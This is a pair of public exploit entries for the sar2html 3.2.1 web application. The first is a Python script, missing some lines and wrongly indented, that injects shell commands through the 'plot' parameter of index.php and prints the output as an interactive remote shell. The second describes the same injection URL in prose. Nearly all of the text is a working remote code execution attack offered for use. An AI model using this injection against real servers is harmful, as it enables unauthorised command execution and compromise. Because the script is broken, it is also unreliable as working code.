# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
        out = re.findall("<option value=(.*?)>", output.text)
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()
if __name__ == ("__main__"):
    terminal = Terminal()

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.